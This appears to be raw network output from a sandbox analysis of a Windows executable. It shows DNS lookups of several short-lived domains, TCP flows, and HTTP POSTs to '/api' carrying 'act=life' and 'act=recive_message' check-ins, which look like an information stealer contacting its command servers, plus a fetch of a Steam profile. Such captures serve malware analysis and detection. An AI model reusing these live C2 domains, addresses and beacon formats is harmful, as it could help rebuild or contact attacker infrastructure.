                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:19.035886049 CET44349748104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:19.035962105 CET49748443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:19.036257982 CET49748443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:19.036274910 CET44349748104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:20.251360893 CET44349748104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:20.251562119 CET49748443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:20.252831936 CET49748443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:20.252844095 CET44349748104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:20.253168106 CET44349748104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:20.261653900 CET49748443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:20.261820078 CET49748443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:20.261852980 CET44349748104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:21.083671093 CET44349748104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:21.083806992 CET44349748104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:21.083857059 CET49748443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:21.083906889 CET49748443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:21.083928108 CET44349748104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:21.189266920 CET49754443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:21.189316034 CET44349754104.21.66.86192.168.2.6
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Dec 20, 2024 07:04:21.189393997 CET  49754        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:21.189681053 CET  49754        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:21.189698935 CET  443          49754      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:22.408716917 CET  443          49754      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:22.408919096 CET  49754        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:22.410001040 CET  49754        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:22.410022020 CET  443          49754      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:22.410559893 CET  443          49754      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:22.411756992 CET  49754        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:22.411894083 CET  49754        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:22.411941051 CET  443          49754      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:22.411997080 CET  49754        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:22.412004948 CET  443          49754      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:23.214493036 CET  443          49754      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:23.214720964 CET  443          49754      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:23.214926958 CET  49754        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:23.214970112 CET  49754        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:23.214988947 CET  443          49754      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:23.386877060 CET  49760        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:23.386917114 CET  443          49760      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:23.386972904 CET  49760        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:23.387336969 CET  49760        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:23.387350082 CET  443          49760      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:24.647840977 CET  443          49760      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:24.648072958 CET  49760        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:24.683618069 CET  49760        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:24.683676004 CET  443          49760      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:24.684549093 CET  443          49760      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:24.685925007 CET  49760        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:24.686106920 CET  49760        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:24.686172962 CET  443          49760      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:24.686254025 CET  49760        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:24.686269999 CET  443          49760      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:25.615819931 CET  443          49760      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:25.616096973 CET  443          49760      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:25.616163969 CET  49760        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:25.616348982 CET  49760        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:25.616389990 CET  443          49760      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:25.977165937 CET  49765        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:25.977258921 CET  443          49765      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:25.977346897 CET  49765        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:25.977658033 CET  49765        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:25.977693081 CET  443          49765      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:27.198915958 CET  443          49765      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:27.199007988 CET  49765        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:27.228327990 CET  49765        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:27.228365898 CET  443          49765      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:27.229254961 CET  443          49765      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:27.232520103 CET  49765        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:27.235841990 CET  49765        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:27.235867977 CET  443          49765      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:27.960411072 CET  443          49765      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:27.960535049 CET  443          49765      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:27.960585117 CET  49765        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:27.960705996 CET  49765        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:27.960730076 CET  443          49765      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:28.441849947 CET  49771        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:28.441900969 CET  443          49771      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:28.442044020 CET  49771        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:28.442528009 CET  49771        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:28.442543030 CET  443          49771      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:29.656738997 CET  443          49771      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:29.656806946 CET  49771        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:29.658190966 CET  49771        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:29.658273935 CET  443          49771      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:29.658514977 CET  443          49771      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:29.659715891 CET  49771        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:29.660502911 CET  49771        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:29.660538912 CET  443          49771      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:29.660733938 CET  49771        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:29.660769939 CET  443          49771      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:29.660872936 CET  49771        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:29.660938978 CET  443          49771      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:29.661484957 CET  49771        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:29.661506891 CET  443          49771      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:29.661639929 CET  49771        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:29.661676884 CET  443          49771      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:29.661825895 CET  49771        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:29.661853075 CET  443          49771      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:29.661879063 CET  49771        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:29.662038088 CET  49771        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:29.662062883 CET  49771        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:29.707329035 CET  443          49771      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:29.707446098 CET  49771        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:29.707487106 CET  49771        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:29.707535028 CET  49771        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:29.755331039 CET  443          49771      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:29.755470037 CET  49771        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:29.755517960 CET  49771        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:29.755537033 CET  49771        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:29.803335905 CET  443          49771      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:29.804785967 CET  49771        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:29.847333908 CET  443          49771      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:30.022654057 CET  443          49771      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:31.957848072 CET  443          49771      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:31.958086967 CET  443          49771      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:31.958138943 CET  49771        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:31.958245039 CET  49771        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:31.958262920 CET  443          49771      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:31.986852884 CET  49781        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:31.986943007 CET  443          49781      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:31.987020016 CET  49781        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:31.987356901 CET  49781        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:31.987391949 CET  443          49781      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:33.207181931 CET  443          49781      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:33.207297087 CET  49781        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:33.208425999 CET  49781        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:33.208436012 CET  443          49781      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:33.208852053 CET  443          49781      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:33.211857080 CET  49781        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:33.211885929 CET  49781        443        192.168.2.6    104.21.66.86
Dec 20, 2024 07:04:33.211940050 CET  443          49781      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:33.968821049 CET  443          49781      104.21.66.86   192.168.2.6
Dec 20, 2024 07:04:33.968931913 CET  443          49781      104.21.66.86   192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:33.968986034 CET49781443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:33.969094992 CET49781443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:33.969105959 CET44349781104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:33.969120979 CET49781443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:33.969125986 CET44349781104.21.66.86192.168.2.6
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                 Type            Class        DNS over HTTPS
Dec 20, 2024 07:04:01.704511881 CET  192.168.2.6  1.1.1.1  0xb91     Standard query (0)  bellflamre.click     A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:02.024945974 CET  192.168.2.6  1.1.1.1  0x5b7f    Standard query (0)  immureprech.biz      A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:03.018352032 CET  192.168.2.6  1.1.1.1  0x5b7f    Standard query (0)  immureprech.biz      A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:05.333755016 CET  192.168.2.6  1.1.1.1  0x6eb2    Standard query (0)  deafeninggeh.biz     A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:06.343594074 CET  192.168.2.6  1.1.1.1  0x6eb2    Standard query (0)  deafeninggeh.biz     A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:08.719711065 CET  192.168.2.6  1.1.1.1  0x8c12    Standard query (0)  effecterectz.xyz     A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:09.024667025 CET  192.168.2.6  1.1.1.1  0x15c4    Standard query (0)  diffuculttan.xyz     A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:09.249701977 CET  192.168.2.6  1.1.1.1  0x881d    Standard query (0)  debonairnukk.xyz     A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:09.472443104 CET  192.168.2.6  1.1.1.1  0xae18    Standard query (0)  wrathful-jammy.cyou  A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:09.691346884 CET  192.168.2.6  1.1.1.1  0x6653    Standard query (0)  awake-weaves.cyou    A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:09.910772085 CET  192.168.2.6  1.1.1.1  0x72d7    Standard query (0)  sordid-snaked.cyou   A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:10.217242002 CET  192.168.2.6  1.1.1.1  0xe940    Standard query (0)  steamcommunity.com   A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:12.893002987 CET  192.168.2.6  1.1.1.1  0x321c    Standard query (0)  lev-tolstoi.com      A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code      Name                 CName  Address         Type            Class        DNS over HTTPS
Dec 20, 2024 07:04:02.020720005 CET  1.1.1.1    192.168.2.6  0xb91     Name error (3)  bellflamre.click     none   none            A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:03.286108017 CET  1.1.1.1    192.168.2.6  0x5b7f    No error (0)    immureprech.biz             178.62.201.34   A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:03.286108017 CET  1.1.1.1    192.168.2.6  0x5b7f    No error (0)    immureprech.biz             104.131.68.180  A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:03.286108017 CET  1.1.1.1    192.168.2.6  0x5b7f    No error (0)    immureprech.biz             45.77.249.79    A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:03.287022114 CET  1.1.1.1    192.168.2.6  0x5b7f    No error (0)    immureprech.biz             178.62.201.34   A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:03.287022114 CET  1.1.1.1    192.168.2.6  0x5b7f    No error (0)    immureprech.biz             104.131.68.180  A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:03.287022114 CET  1.1.1.1    192.168.2.6  0x5b7f    No error (0)    immureprech.biz             45.77.249.79    A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:06.608409882 CET  1.1.1.1    192.168.2.6  0x6eb2    No error (0)    deafeninggeh.biz            178.62.201.34   A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:06.608409882 CET  1.1.1.1    192.168.2.6  0x6eb2    No error (0)    deafeninggeh.biz            104.131.68.180  A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:06.608409882 CET  1.1.1.1    192.168.2.6  0x6eb2    No error (0)    deafeninggeh.biz            45.77.249.79    A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:06.608872890 CET  1.1.1.1    192.168.2.6  0x6eb2    No error (0)    deafeninggeh.biz            178.62.201.34   A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:06.608872890 CET  1.1.1.1    192.168.2.6  0x6eb2    No error (0)    deafeninggeh.biz            104.131.68.180  A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:06.608872890 CET  1.1.1.1    192.168.2.6  0x6eb2    No error (0)    deafeninggeh.biz            45.77.249.79    A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:09.021348953 CET  1.1.1.1    192.168.2.6  0x8c12    Name error (3)  effecterectz.xyz     none   none            A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:09.248236895 CET  1.1.1.1    192.168.2.6  0x15c4    Name error (3)  diffuculttan.xyz     none   none            A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:09.469168901 CET  1.1.1.1    192.168.2.6  0x881d    Name error (3)  debonairnukk.xyz     none   none            A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:09.689680099 CET  1.1.1.1    192.168.2.6  0xae18    Name error (3)  wrathful-jammy.cyou  none   none            A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:09.909045935 CET  1.1.1.1    192.168.2.6  0x6653    Name error (3)  awake-weaves.cyou    none   none            A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:10.213623047 CET  1.1.1.1    192.168.2.6  0x72d7    Name error (3)  sordid-snaked.cyou   none   none            A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:10.355187893 CET  1.1.1.1    192.168.2.6  0xe940    No error (0)    steamcommunity.com          23.55.153.106   A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:13.122935057 CET  1.1.1.1    192.168.2.6  0x321c    No error (0)    lev-tolstoi.com             104.21.66.86    A (IP address)  IN (0x0001)  false
Dec 20, 2024 07:04:13.122935057 CET  1.1.1.1    192.168.2.6  0x321c    No error (0)    lev-tolstoi.com             172.67.157.254  A (IP address)  IN (0x0001)  false
• immureprech.biz
• deafeninggeh.biz
• steamcommunity.com
• lev-tolstoi.com
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.6  49708        178.62.201.34   443               2144  C:\Users\user\Desktop\8ZVMneG.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-20 06:04:04 UTC  262                OUT
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: immureprech.biz
2024-12-20 06:04:04 UTC  8                  OUT
    Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-12-20 06:04:05 UTC  94                 IN
    HTTP/1.1 200 OK
    Date: Fri, 20 Dec 2024 06:04:05 GMT
    Content-Length: 0
    Connection: close


Session ID: 1
Source IP: 192.168.2.6
Source Port: 49710
Destination IP: 178.62.201.34
Destination Port: 443
PID: 2144
Process: C:\Users\user\Desktop\8ZVMneG.exe

Timestamp: 2024-12-20 06:04:08 UTC | Bytes transferred: 263 | Direction: OUT
Data:
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: deafeninggeh.biz

Timestamp: 2024-12-20 06:04:08 UTC | Bytes transferred: 8 | Direction: OUT
Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life

Timestamp: 2024-12-20 06:04:08 UTC | Bytes transferred: 94 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 06:04:08 GMT
Content-Length: 0
Connection: close


Session ID: 2
Source IP: 192.168.2.6
Source Port: 49721
Destination IP: 23.55.153.106
Destination Port: 443
PID: 2144
Process: C:\Users\user\Desktop\8ZVMneG.exe

Timestamp: 2024-12-20 06:04:11 UTC | Bytes transferred: 219 | Direction: OUT
Data:
GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com

Timestamp: 2024-12-20 06:04:12 UTC | Bytes transferred: 1905 | Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Fri, 20 Dec 2024 06:04:12 GMT
Content-Length: 35121
Connection: close
Set-Cookie: sessionid=9141f4cafee052551e41627d; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None

Timestamp: 2024-12-20 06:04:12 UTC | Bytes transferred: 14479 | Direction: IN
Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>

Timestamp: 2024-12-20 06:04:12 UTC | Bytes transferred: 10097 | Direction: IN
Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT

Timestamp: 2024-12-20 06:04:12 UTC | Bytes transferred: 10545 | Direction: IN
Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


Session ID: 3
Source IP: 192.168.2.6
Source Port: 49730
Destination IP: 104.21.66.86
Destination Port: 443
PID: 2144
Process: C:\Users\user\Desktop\8ZVMneG.exe

Timestamp: 2024-12-20 06:04:14 UTC | Bytes transferred: 262 | Direction: OUT
Data:
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: lev-tolstoi.com

Timestamp: 2024-12-20 06:04:14 UTC | Bytes transferred: 8 | Direction: OUT
Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life

Timestamp: 2024-12-20 06:04:15 UTC | Bytes transferred: 1124 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 06:04:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=mgtccgkpjpkcs0hk7sv4ukjech; expires=Mon, 14 Apr 2025 23:50:54 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZA9Jn%2Bdea2tFIz3F1bqirqmh08VVhXojEJmgIqopFyA33ixIgZ7kqU2nE1glmqdamEOVQ%2FJjqRkfADn3chVwrZBBhIWmmFROW0DeJ6rBvZabHgBbzVSEeXE4Rr%2FgVzN9Dnw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f4d6f103aa832c7-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1813&min_rtt=1811&rtt_var=683&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1596500&cwnd=138&unsent_bytes=0&cid=f0ee5beb679843cc&ts=1207&x=0"

Timestamp: 2024-12-20 06:04:15 UTC | Bytes transferred: 7 | Direction: IN
Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok

Timestamp: 2024-12-20 06:04:15 UTC | Bytes transferred: 5 | Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 4
Source IP: 192.168.2.6
Source Port: 49737
Destination IP: 104.21.66.86
Destination Port: 443
PID: 2144
Process: C:\Users\user\Desktop\8ZVMneG.exe

Timestamp: 2024-12-20 06:04:16 UTC | Bytes transferred: 263 | Direction: OUT
Data:
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 54
Host: lev-tolstoi.com

Timestamp: 2024-12-20 06:04:16 UTC | Bytes transferred: 54 | Direction: OUT
Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 6e 62 67 6e 78 64 6c 78 64 6e 79 6f 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--nbgnxdlxdnyo&j=

Timestamp: 2024-12-20 06:04:17 UTC | Bytes transferred: 1121 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 06:04:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=o0i6mvr0n6okc1n4eiejmlgfjk; expires=Mon, 14 Apr 2025 23:50:56 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cmaSi0TMw41Ovb5tOBasT2xYZuH4obbIoWyEWh5CaFE2nvAniulQjcx0yWI8TdNulqS54x47eTKZZJWX%2F9XxtPX6gAtJeT%2BBa7DPvjifIzoxr8PNwZMkjluyHclHR6i0qC4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8f4d6f1fff114308-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1600&rtt_var=606&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=953&delivery_rate=1796923&cwnd=228&unsent_bytes=0&cid=0f9719e623d9fd62&ts=794&x=0"
